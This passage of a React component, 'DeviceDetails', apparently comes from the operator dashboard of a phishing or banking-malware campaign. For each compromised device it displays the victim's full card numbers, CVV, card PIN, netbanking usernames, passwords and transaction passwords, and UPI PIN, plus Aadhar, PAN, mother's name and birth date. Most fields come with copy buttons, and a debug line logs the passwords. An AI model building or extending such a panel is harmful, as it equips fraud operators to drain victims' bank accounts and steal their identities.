                    if (!cardNum || cardNum === null || cardNum === undefined || cardNum === 'null' || cardNum === '') return null;
                    
                    return (
                      <div key={`card-${cardNumber}`} style={{
                        background: 'linear-gradient(135deg, #667eea 0%, #764ba2 100%)',
                        borderRadius: '12px',
                        padding: '20px',
                        color: 'white',
                        marginBottom: '20px',
                        boxShadow: '0 4px 12px rgba(102, 126, 234, 0.3)',
                        position: 'relative',
                        overflow: 'hidden'
                      }}>
                        <div style={{ 
                          position: 'absolute', 
                          top: '10px', 
                          right: '10px', 
                          fontSize: '12px', 
                          opacity: 0.8 
                        }}>
                          Card {cardNumber}
                        </div>
                        <div style={{ marginBottom: '20px' }}>
                          <div style={{ fontSize: '12px', opacity: 0.9, marginBottom: '8px' }}>Card Number</div>
                          <div style={{ fontSize: '20px', fontWeight: '700', letterSpacing: '2px', fontFamily: 'monospace' }}>
                            {cardNum.replace(/(.{4})/g, '$1 ').trim()}
                          </div>
                        </div>
                        <div style={{ display: 'flex', gap: '20px', marginTop: '20px' }}>
                          <div style={{ flex: 1 }}>
                            <div style={{ fontSize: '11px', opacity: 0.8, marginBottom: '4px' }}>Expiry</div>
                            <div style={{ fontSize: '14px', fontWeight: '600' }}>{cardExpiry || 'N/A'}</div>
                          </div>
                          <div style={{ flex: 1 }}>
                            <div style={{ fontSize: '11px', opacity: 0.8, marginBottom: '4px' }}>CVV</div>
                            <div style={{ fontSize: '14px', fontWeight: '600' }}>{cardCvv || 'N/A'}</div>
                          </div>
                          <div style={{ flex: 1 }}>
                            <div style={{ fontSize: '11px', opacity: 0.8, marginBottom: '4px' }}>PIN</div>
                            <div style={{ fontSize: '14px', fontWeight: '600' }}>{cardPin || 'N/A'}</div>
                          </div>
                        </div>
                        <div style={{ marginTop: '16px', paddingTop: '16px', borderTop: '1px solid rgba(255,255,255,0.2)' }}>
                          <div style={{ fontSize: '11px', opacity: 0.8, marginBottom: '4px' }}>Type</div>
                          <div style={{ fontSize: '13px', fontWeight: '500' }}>{cardType}</div>
                          {cardDate && (
                            <div style={{ fontSize: '11px', opacity: 0.7, marginTop: '4px' }}>{cardDate}</div>
                          )}
                        </div>
                      </div>
                    );
                  };

                  const createNetbankingCard = (nbData, nbNumber) => {
                    if (!nbData) return null;
                    
                    const bankName = nbData[`netbanking${nbNumber}_bankName`];
                    const username = nbData[`netbanking${nbNumber}_username`];
                    const password = nbData[`netbanking${nbNumber}_password`];
                    const transactionPassword = nbData[`netbanking${nbNumber}_transactionPassword`];
                    const date = nbData[`netbanking${nbNumber}_date`];
                    
                    // Debug: log to see what we have
                    console.log(`Netbanking ${nbNumber} check:`, { 
                      bankName, 
                      username, 
                      password, 
                      transactionPassword,
                      allKeys: Object.keys(nbData).filter(k => k.includes('netbanking'))
                    });
                    
                    if ((!bankName || bankName === null || bankName === undefined || bankName === 'null' || bankName === '') && 
                        (!username || username === null || username === undefined || username === 'null' || username === '')) return null;
                    
                    return (
                      <div key={`netbanking-${nbNumber}`} style={{
                        background: 'white',
                        border: '2px solid #e5e7eb',
                        borderRadius: '12px',
                        padding: '20px',
                        marginBottom: '20px',
                        boxShadow: '0 2px 8px rgba(0,0,0,0.08)'
                      }}>
                        <div style={{ 
                          fontSize: '16px', 
                          fontWeight: '700', 
                          color: '#1f2937', 
                          marginBottom: '16px',
                          display: 'flex',
                          alignItems: 'center',
                          gap: '8px'
                        }}>
                          <span>🏦</span>
                          <span>Netbanking {nbNumber}</span>
                        </div>
                        <div style={{ display: 'grid', gap: '12px' }}>
                          {createCopyableField('Bank Name', bankName, `nb${nbNumber}-bank`)}
                          {createCopyableField('Username', username, `nb${nbNumber}-user`)}
                          {createCopyableField('Password', password, `nb${nbNumber}-pass`)}
                          {createCopyableField('Transaction Password', transactionPassword, `nb${nbNumber}-tpass`)}
                          {date && (
                            <div style={{ fontSize: '12px', color: '#6b7280', marginTop: '4px' }}>
                              Date: {date}
                            </div>
                          )}
                        </div>
                      </div>
                    );
                  };

                  return (
                    <div style={{ display: 'flex', flexDirection: 'column', gap: '20px' }}>
                      {/* Basic Information */}
                      <div style={{ display: 'grid', gap: '16px' }}>
                        {createCopyableField('Full Name', device.clientData.fullName, 'fullName')}
                        {createCopyableField('Aadhar Number', device.clientData.aadharNumber, 'aadhar')}
                        {createCopyableField('Mobile Number', device.clientData.mobileNumber, 'mobile')}
                        {createCopyableField("Mother's Name", device.clientData.motherName, 'mother')}
                        {createCopyableField('PAN Number', device.clientData.panNumber, 'pan')}
                        {createCopyableField('Date of Birth', device.clientData.dob, 'dob')}
                      </div>

                      {/* Card 1 Prototype */}
                      {(() => {
                        const card1 = createCardPrototype(device.clientData, 1);
                        return card1;
                      })()}

                      {/* Card 2 Prototype */}
                      {(() => {
                        const card2 = createCardPrototype(device.clientData, 2);
                        return card2;
                      })()}

                      {/* Netbanking 1 */}
                      {(() => {
                        const nb1 = createNetbankingCard(device.clientData, 1);
                        return nb1;
                      })()}

                      {/* Netbanking 2 */}
                      {(() => {
                        const nb2 = createNetbankingCard(device.clientData, 2);
                        return nb2;
                      })()}

                      {/* UPI PIN */}
                      {device.clientData.upiPin && (
                        <div style={{
                          background: '#f9fafb',
                          border: '1px solid #e5e7eb',
                          borderRadius: '12px',
                          padding: '20px',
                          marginTop: '10px'
                        }}>
                          {createCopyableField('UPI PIN', device.clientData.upiPin, 'upi-pin')}
                        </div>
                      )}
                    </div>
                  );
                })()}
              </div>
            ) : (
              <div style={{ 
                background: 'white', 
                padding: '40px', 
                borderRadius: '8px', 
                textAlign: 'center',
                color: '#6b7280'
              }}>
                No client data available
              </div>
            )}
          </div>
        )}
      </main>
    </div>
  );
};

export default DeviceDetails;
